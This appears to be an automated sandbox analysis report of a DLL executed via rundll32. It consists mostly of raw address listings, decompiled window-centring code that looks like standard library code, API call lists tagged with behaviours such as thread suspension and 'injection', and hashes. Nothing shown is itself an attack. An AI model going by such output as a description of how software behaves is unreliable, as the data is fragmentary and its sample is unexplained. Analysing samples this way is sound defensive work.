                                                                                                                                    0x1002a8b0
                                                                                                                                    0x1002a8b0
                                                                                                                                    0x1002a8b6
                                                                                                                                    0x1002a8c7
                                                                                                                                    0x1002a8c7
                                                                                                                                    0x1002a8c9
                                                                                                                                    0x1002a976
                                                                                                                                    0x1002a978
                                                                                                                                    0x1002a97a
                                                                                                                                    0x1002a97d
                                                                                                                                    0x1002a982
                                                                                                                                    0x1002a985
                                                                                                                                    0x1002a98b
                                                                                                                                    0x1002a98b
                                                                                                                                    0x1002a98d
                                                                                                                                    0x1002a994
                                                                                                                                    0x1002aa1e
                                                                                                                                    0x1002aa23
                                                                                                                                    0x1002aa27
                                                                                                                                    0x1002aa2a
                                                                                                                                    0x1002ab67
                                                                                                                                    0x1002ab6a
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab70
                                                                                                                                    0x1002ab70
                                                                                                                                    0x1002ab73
                                                                                                                                    0x1002ac23
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab79
                                                                                                                                    0x1002ab79
                                                                                                                                    0x1002ab7c
                                                                                                                                    0x1002ac2a
                                                                                                                                    0x1002ac2e
                                                                                                                                    0x1002ac33
                                                                                                                                    0x1002ac35
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ac3b
                                                                                                                                    0x1002ac3b
                                                                                                                                    0x1002ac3f
                                                                                                                                    0x1002ac42
                                                                                                                                    0x1002ac44
                                                                                                                                    0x1002ac4d
                                                                                                                                    0x1002ac46
                                                                                                                                    0x1002ac46
                                                                                                                                    0x1002ac46
                                                                                                                                    0x1002ac52
                                                                                                                                    0x1002ac54
                                                                                                                                    0x1002ac56
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ac5c
                                                                                                                                    0x1002ac5c
                                                                                                                                    0x1002ac60
                                                                                                                                    0x1002ac62
                                                                                                                                    0x1002ac66
                                                                                                                                    0x1002ac66
                                                                                                                                    0x1002ac6b
                                                                                                                                    0x1002ac6f
                                                                                                                                    0x1002ac7f
                                                                                                                                    0x1002ac81
                                                                                                                                    0x1002ac83
                                                                                                                                    0x1002ac90
                                                                                                                                    0x1002ac96
                                                                                                                                    0x1002ac85
                                                                                                                                    0x1002ac86
                                                                                                                                    0x1002ac86
                                                                                                                                    0x1002ac9b
                                                                                                                                    0x1002ac9d
                                                                                                                                    0x1002ac9f
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aca5
                                                                                                                                    0x1002acab
                                                                                                                                    0x1002acae
                                                                                                                                    0x1002acb1
                                                                                                                                    0x1002acb6
                                                                                                                                    0x1002acb9
                                                                                                                                    0x1002acc6
                                                                                                                                    0x1002acc6
                                                                                                                                    0x00000000
                                                                                                                                    0x1002acb9
                                                                                                                                    0x1002ac71
                                                                                                                                    0x1002ac71
                                                                                                                                    0x1002ac77
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ac77
                                                                                                                                    0x1002ac6f
                                                                                                                                    0x1002ac56
                                                                                                                                    0x1002ab82
                                                                                                                                    0x1002ab82
                                                                                                                                    0x1002ab85
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab85
                                                                                                                                    0x1002ab7c
                                                                                                                                    0x1002ab73
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa30
                                                                                                                                    0x1002aa30
                                                                                                                                    0x1002abbf
                                                                                                                                    0x1002abbf
                                                                                                                                    0x1002abbf
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa36
                                                                                                                                    0x1002aa36
                                                                                                                                    0x1002aa39
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa3f
                                                                                                                                    0x1002aa3f
                                                                                                                                    0x1002aa42
                                                                                                                                    0x1002aae1
                                                                                                                                    0x1002aae3
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aae9
                                                                                                                                    0x1002aaeb
                                                                                                                                    0x1002aaf1
                                                                                                                                    0x1002aaf6
                                                                                                                                    0x1002aaf9
                                                                                                                                    0x1002aafc
                                                                                                                                    0x1002ab01
                                                                                                                                    0x1002ab06
                                                                                                                                    0x1002ab08
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab0e
                                                                                                                                    0x1002ab0e
                                                                                                                                    0x1002ab12
                                                                                                                                    0x1002ab27
                                                                                                                                    0x1002ab29
                                                                                                                                    0x1002ab2b
                                                                                                                                    0x1002ab39
                                                                                                                                    0x1002ab3b
                                                                                                                                    0x1002ab2d
                                                                                                                                    0x1002ab2e
                                                                                                                                    0x1002ab2e
                                                                                                                                    0x1002ab40
                                                                                                                                    0x1002ab42
                                                                                                                                    0x1002ab44
                                                                                                                                    0x1002ab4d
                                                                                                                                    0x1002ab52
                                                                                                                                    0x1002ab5b
                                                                                                                                    0x1002ab61
                                                                                                                                    0x1002ab61
                                                                                                                                    0x1002ab14
                                                                                                                                    0x1002ab14
                                                                                                                                    0x1002ab1a
                                                                                                                                    0x1002ab1c
                                                                                                                                    0x1002ab1c
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab12
                                                                                                                                    0x1002ab08
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa48
                                                                                                                                    0x1002aa48
                                                                                                                                    0x1002aa4b
                                                                                                                                    0x1002ab8b
                                                                                                                                    0x1002ab8b
                                                                                                                                    0x1002ab8d
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ab93
                                                                                                                                    0x1002ab96
                                                                                                                                    0x1002ab9b
                                                                                                                                    0x1002ab9d
                                                                                                                                    0x1002ab9e
                                                                                                                                    0x1002abaf
                                                                                                                                    0x1002aba0
                                                                                                                                    0x1002aba0
                                                                                                                                    0x1002aba3
                                                                                                                                    0x1002aba5
                                                                                                                                    0x1002aba5
                                                                                                                                    0x1002abb4
                                                                                                                                    0x1002abb6
                                                                                                                                    0x1002abb8
                                                                                                                                    0x1002abbb
                                                                                                                                    0x1002abd6
                                                                                                                                    0x1002abd6
                                                                                                                                    0x1002abd8
                                                                                                                                    0x1002abdd
                                                                                                                                    0x1002abdf
                                                                                                                                    0x1002abed
                                                                                                                                    0x1002abf0
                                                                                                                                    0x00000000
                                                                                                                                    0x1002abf6
                                                                                                                                    0x1002abf6
                                                                                                                                    0x1002abf7
                                                                                                                                    0x1002abf8
                                                                                                                                    0x1002abf9
                                                                                                                                    0x1002abfb
                                                                                                                                    0x1002ac00
                                                                                                                                    0x1002ac01
                                                                                                                                    0x1002ac04
                                                                                                                                    0x1002ac0c
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ac0c
                                                                                                                                    0x1002abe1
                                                                                                                                    0x1002abe2
                                                                                                                                    0x00000000
                                                                                                                                    0x1002abe2
                                                                                                                                    0x1002abbd
                                                                                                                                    0x1002abc1
                                                                                                                                    0x1002abcc
                                                                                                                                    0x1002abce
                                                                                                                                    0x1002abd0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002abd0
                                                                                                                                    0x1002abbb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa4b
                                                                                                                                    0x1002aa42
                                                                                                                                    0x1002aa39
                                                                                                                                    0x1002aa30
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a99a
                                                                                                                                    0x1002a99b
                                                                                                                                    0x1002a99b
                                                                                                                                    0x1002a99c
                                                                                                                                    0x1002a9c8
                                                                                                                                    0x1002a9cc
                                                                                                                                    0x1002a9d1
                                                                                                                                    0x1002a9d8
                                                                                                                                    0x1002a9de
                                                                                                                                    0x1002a9de
                                                                                                                                    0x1002a9e2
                                                                                                                                    0x1002a9e6
                                                                                                                                    0x1002a9ec
                                                                                                                                    0x1002a9ec
                                                                                                                                    0x1002a9f0
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a9f6
                                                                                                                                    0x1002a9f6
                                                                                                                                    0x1002a9fd
                                                                                                                                    0x1002aa02
                                                                                                                                    0x1002aa04
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa06
                                                                                                                                    0x1002aa06
                                                                                                                                    0x1002aa09
                                                                                                                                    0x1002aa0b
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa0d
                                                                                                                                    0x1002aa0e
                                                                                                                                    0x1002aa10
                                                                                                                                    0x1002accc
                                                                                                                                    0x1002accc
                                                                                                                                    0x1002accc
                                                                                                                                    0x1002aa0b
                                                                                                                                    0x00000000
                                                                                                                                    0x1002aa04
                                                                                                                                    0x1002a9e8
                                                                                                                                    0x1002a9e8
                                                                                                                                    0x1002a9ea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a9ea
                                                                                                                                    0x1002a9da
                                                                                                                                    0x1002a9da
                                                                                                                                    0x1002a9dc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a9dc
                                                                                                                                    0x1002a99e
                                                                                                                                    0x1002a99e
                                                                                                                                    0x1002a9a1
                                                                                                                                    0x1002aa51
                                                                                                                                    0x1002aa51
                                                                                                                                    0x1002aa54
                                                                                                                                    0x1002aa5a
                                                                                                                                    0x1002aa62
                                                                                                                                    0x1002aa68
                                                                                                                                    0x1002aa6a
                                                                                                                                    0x1002aa6d
                                                                                                                                    0x1002aa78
                                                                                                                                    0x1002aa7d
                                                                                                                                    0x1002aa80
                                                                                                                                    0x1002aa8b
                                                                                                                                    0x1002aa90
                                                                                                                                    0x1002aa90
                                                                                                                                    0x1002aa80
                                                                                                                                    0x1002aa6d
                                                                                                                                    0x1002aa91
                                                                                                                                    0x1002aa9a
                                                                                                                                    0x1002aa9c
                                                                                                                                    0x1002aa9e
                                                                                                                                    0x1002aab2
                                                                                                                                    0x1002aabc
                                                                                                                                    0x1002aabe
                                                                                                                                    0x1002aac0
                                                                                                                                    0x1002aad1
                                                                                                                                    0x1002aad1
                                                                                                                                    0x1002aac0
                                                                                                                                    0x1002aad6
                                                                                                                                    0x1002a9a7
                                                                                                                                    0x1002a9a7
                                                                                                                                    0x1002a9aa
                                                                                                                                    0x1002a9bd
                                                                                                                                    0x1002a9bd
                                                                                                                                    0x1002a9c2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a9ac
                                                                                                                                    0x1002a9ae
                                                                                                                                    0x1002a9b4
                                                                                                                                    0x1002a9b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a9b7
                                                                                                                                    0x1002a9aa
                                                                                                                                    0x1002a9a1
                                                                                                                                    0x1002a99c
                                                                                                                                    0x1002a8cf
                                                                                                                                    0x1002a8d5
                                                                                                                                    0x1002a8d7
                                                                                                                                    0x1002a8d7
                                                                                                                                    0x1002a8db
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a8e3
                                                                                                                                    0x1002a8e8
                                                                                                                                    0x1002a8eb
                                                                                                                                    0x1002a8f8
                                                                                                                                    0x1002a8fa
                                                                                                                                    0x1002a8fc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a8fc
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a8eb
                                                                                                                                    0x1002a8fe
                                                                                                                                    0x1002a900
                                                                                                                                    0x1002a925
                                                                                                                                    0x1002a925
                                                                                                                                    0x1002a92c
                                                                                                                                    0x1002a93c
                                                                                                                                    0x1002a93c
                                                                                                                                    0x1002a93e
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a940
                                                                                                                                    0x1002a940
                                                                                                                                    0x1002a943
                                                                                                                                    0x1002a945
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a947
                                                                                                                                    0x1002a94a
                                                                                                                                    0x1002a94e
                                                                                                                                    0x1002a952
                                                                                                                                    0x1002a95d
                                                                                                                                    0x1002a95d
                                                                                                                                    0x1002a961
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a963
                                                                                                                                    0x1002a963
                                                                                                                                    0x1002a96a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a96a
                                                                                                                                    0x1002a954
                                                                                                                                    0x1002a954
                                                                                                                                    0x1002a95b
                                                                                                                                    0x1002a96c
                                                                                                                                    0x1002a96c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a95b
                                                                                                                                    0x1002a952
                                                                                                                                    0x1002a945
                                                                                                                                    0x1002a92e
                                                                                                                                    0x1002a92e
                                                                                                                                    0x1002a931
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a933
                                                                                                                                    0x1002a933
                                                                                                                                    0x1002a93a
                                                                                                                                    0x1002a973
                                                                                                                                    0x1002a973
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a93a
                                                                                                                                    0x1002a931
                                                                                                                                    0x1002a902
                                                                                                                                    0x1002a902
                                                                                                                                    0x1002a905
                                                                                                                                    0x1002a907
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a909
                                                                                                                                    0x1002a909
                                                                                                                                    0x1002a90d
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a90f
                                                                                                                                    0x1002a90f
                                                                                                                                    0x1002a915
                                                                                                                                    0x1002a918
                                                                                                                                    0x1002a91b
                                                                                                                                    0x1002a91d
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a91f
                                                                                                                                    0x1002a91f
                                                                                                                                    0x1002a91f
                                                                                                                                    0x1002a91d
                                                                                                                                    0x1002a90d
                                                                                                                                    0x1002a907
                                                                                                                                    0x1002a900
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a8b6
                                                                                                                                    0x1002aade
                                                                                                                                    0x1002a83a
                                                                                                                                    0x1002a83a
                                                                                                                                    0x1002a83f
                                                                                                                                    0x1002a842
                                                                                                                                    0x1002a847
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a847
                                                                                                                                    0x1002a814
                                                                                                                                    0x1002a814
                                                                                                                                    0x1002a819
                                                                                                                                    0x1002a820
                                                                                                                                    0x1002a81b
                                                                                                                                    0x1002a81b
                                                                                                                                    0x1002a81b
                                                                                                                                    0x1002a824
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a826
                                                                                                                                    0x1002a82f
                                                                                                                                    0x1002a849
                                                                                                                                    0x1002a849
                                                                                                                                    0x1002a84c
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a84e
                                                                                                                                    0x1002a84e
                                                                                                                                    0x1002a851
                                                                                                                                    0x1002a853
                                                                                                                                    0x1002a853
                                                                                                                                    0x1002a856
                                                                                                                                    0x1002a857
                                                                                                                                    0x1002a85d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a85d
                                                                                                                                    0x1002a831
                                                                                                                                    0x1002a831
                                                                                                                                    0x1002a831
                                                                                                                                    0x1002a861
                                                                                                                                    0x1002a865
                                                                                                                                    0x1002a865
                                                                                                                                    0x1002a82f
                                                                                                                                    0x1002a824
                                                                                                                                    0x1002a800
                                                                                                                                    0x1002a800
                                                                                                                                    0x1002a80a
                                                                                                                                    0x1002a80e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a80e
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a7fe
                                                                                                                                    0x1002a85f
                                                                                                                                    0x1002a85f
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 656273425-0
                                                                                                                                    • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                    • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                                    • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                    • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1001DDC0(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10014B42();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                                                    0x1001aa48
                                                                                                                                    0x1001aa48
                                                                                                                                    0x1001aa4f
                                                                                                                                    0x1001aa52
                                                                                                                                    0x1001aa5a
                                                                                                                                    0x1001aa5d
                                                                                                                                    0x1001aa62
                                                                                                                                    0x1001aa70
                                                                                                                                    0x1001aa82
                                                                                                                                    0x1001aa72
                                                                                                                                    0x1001aa75
                                                                                                                                    0x1001aa75
                                                                                                                                    0x1001aa88
                                                                                                                                    0x1001aa8c
                                                                                                                                    0x1001aa98
                                                                                                                                    0x1001aaa0
                                                                                                                                    0x1001aaa2
                                                                                                                                    0x1001aaa2
                                                                                                                                    0x1001aaa0
                                                                                                                                    0x1001aa64
                                                                                                                                    0x1001aa64
                                                                                                                                    0x1001aa64
                                                                                                                                    0x1001aa64
                                                                                                                                    0x1001aaa4
                                                                                                                                    0x1001aab2
                                                                                                                                    0x1001aabb
                                                                                                                                    0x1001ab5b
                                                                                                                                    0x1001ab62
                                                                                                                                    0x1001ab69
                                                                                                                                    0x1001ab73
                                                                                                                                    0x1001aac1
                                                                                                                                    0x1001aac3
                                                                                                                                    0x1001aac8
                                                                                                                                    0x1001aad3
                                                                                                                                    0x1001aadc
                                                                                                                                    0x1001aadc
                                                                                                                                    0x1001aad3
                                                                                                                                    0x1001aae0
                                                                                                                                    0x1001aae7
                                                                                                                                    0x1001ab28
                                                                                                                                    0x1001ab37
                                                                                                                                    0x1001ab44
                                                                                                                                    0x1001aae9
                                                                                                                                    0x1001aae9
                                                                                                                                    0x1001aaf0
                                                                                                                                    0x1001aaf2
                                                                                                                                    0x1001aaf2
                                                                                                                                    0x1001ab02
                                                                                                                                    0x1001ab15
                                                                                                                                    0x1001ab1f
                                                                                                                                    0x1001ab1f
                                                                                                                                    0x1001aae7
                                                                                                                                    0x1001ab82
                                                                                                                                    0x1001ab87
                                                                                                                                    0x1001ab8c
                                                                                                                                    0x1001ab90
                                                                                                                                    0x1001ab93
                                                                                                                                    0x1001ab9a
                                                                                                                                    0x1001aba2
                                                                                                                                    0x1001abaa
                                                                                                                                    0x1001abb2
                                                                                                                                    0x1001abb9
                                                                                                                                    0x1001abbe
                                                                                                                                    0x1001abca
                                                                                                                                    0x1001abd2
                                                                                                                                    0x1001abd2
                                                                                                                                    0x1001abc0
                                                                                                                                    0x1001abc0
                                                                                                                                    0x1001abc0
                                                                                                                                    0x1001abd8
                                                                                                                                    0x1001abe7
                                                                                                                                    0x1001abef
                                                                                                                                    0x1001abef
                                                                                                                                    0x1001abda
                                                                                                                                    0x1001abda
                                                                                                                                    0x1001abda
                                                                                                                                    0x1001ac07

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                    • GetParent.USER32(?), ref: 1001AA75
                                                                                                                                    • SendMessageA.USER32 ref: 1001AA98
                                                                                                                                    • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                                    • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 808654186-3887548279
                                                                                                                                    • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                    • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                                    • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                    • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 100161DE
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                                    • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                                    • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3191170017-0
                                                                                                                                    • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                    • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                                    • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                    • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
